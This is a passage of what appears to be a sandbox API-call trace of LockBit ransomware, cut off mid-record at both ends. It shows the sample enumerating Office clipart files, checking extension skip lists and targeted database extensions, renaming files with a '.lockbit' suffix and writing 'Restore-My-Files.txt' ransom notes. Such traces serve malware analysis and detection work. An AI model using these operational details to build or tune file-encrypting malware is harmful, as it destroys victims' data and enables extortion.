lpString2=".GIF") returned 1 [0124.606] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF.lockbit") returned 72 [0124.606] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099202.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0124.607] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.607] malloc (_Size=0x40068) returned 0x3df0008 [0124.607] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4967) returned 1 [0124.607] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.608] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.608] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.608] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0124.616] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.616] malloc (_Size=0xa6) returned 0x77d7a8 [0124.617] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0124.617] free (_Block=0x77d7a8) [0124.617] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.617] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.617] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.617] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65df6970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0xf40, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099203.GIF", cAlternateFileName="")) returned 1 [0124.617] lstrcmpiW (lpString1=".", lpString2="J0099203.GIF") returned -1 [0124.617] lstrcmpiW (lpString1="..", lpString2="J0099203.GIF") returned -1 [0124.618] PathFindExtensionW (pszPath="J0099203.GIF") returned=".GIF" [0124.618] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0124.618] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0124.618] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0124.618] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0124.618] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0124.618] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0124.618] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0124.618] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0124.618] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0124.618] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0124.618] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0124.618] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.618] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0124.619] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0124.619] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0124.619] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0124.619] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099203.GIF") returned 1 [0124.619] lstrcmpiW (lpString1="ntldr", lpString2="J0099203.GIF") returned 1 [0124.619] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099203.GIF") returned 1 [0124.619] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099203.GIF") returned -1 [0124.620] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099203.GIF") returned -1 [0124.620] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099203.GIF") returned 1 [0124.620] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099203.GIF") returned -1 [0124.620] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.620] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned=".GIF" [0124.620] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0124.620] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0124.620] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0124.620] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0124.620] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0124.620] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0124.620] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0124.620] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0124.620] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0124.620] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0124.621] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0124.621] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0124.621] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0124.621] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0124.621] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0124.621] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0124.621] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF.lockbit") returned 72 [0124.621] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099203.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0124.622] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.622] malloc (_Size=0x40068) returned 0x3df0008 [0124.622] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3904) returned 1 [0124.622] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.622] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.622] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.623] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.623] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0124.983] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.983] malloc (_Size=0xa6) returned 0x77d7a8 [0124.983] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0124.983] free (_Block=0x77d7a8) [0124.983] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.983] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.983] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.983] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65df6970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x45be, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099204.WMF", cAlternateFileName="")) returned 1 [0124.983] lstrcmpiW (lpString1=".", lpString2="J0099204.WMF") returned -1 [0124.983] lstrcmpiW (lpString1="..", lpString2="J0099204.WMF") returned -1 [0124.983] PathFindExtensionW (pszPath="J0099204.WMF") returned=".WMF" [0124.983] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0124.983] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0124.983] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0124.984] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0124.985] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0124.985] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0124.986] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0124.986] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0124.986] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099204.WMF") returned 1 [0124.986] lstrcmpiW (lpString1="ntldr", lpString2="J0099204.WMF") returned 1 [0124.986] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099204.WMF") returned 1 [0124.986] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099204.WMF") returned -1 [0124.986] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099204.WMF") returned -1 [0124.986] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099204.WMF") returned 1 [0124.986] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099204.WMF") returned -1 [0124.986] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.986] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned=".WMF" [0124.986] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0124.986] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0124.986] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0124.986] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0124.986] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0124.986] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0124.986] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0124.987] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0124.987] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF.lockbit") returned 72 [0124.987] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099204.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0125.003] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0125.003] malloc (_Size=0x40068) returned 0x3df0008 [0125.003] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=17854) returned 1 [0125.003] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.003] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0125.003] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.004] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0125.004] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0125.009] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0125.009] malloc (_Size=0xa6) returned 0x77d7a8 [0125.010] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0125.011] free (_Block=0x77d7a8) [0125.011] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0125.011] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0125.011] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0125.011] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x45be, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099205.WMF", cAlternateFileName="")) returned 1 [0125.011] lstrcmpiW (lpString1=".", lpString2="J0099205.WMF") returned -1 [0125.011] lstrcmpiW (lpString1="..", lpString2="J0099205.WMF") returned -1 [0125.011] PathFindExtensionW (pszPath="J0099205.WMF") returned=".WMF" [0125.011] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0125.011] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0125.011] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0125.011] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0125.011] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0125.012] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0125.013] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".ics", 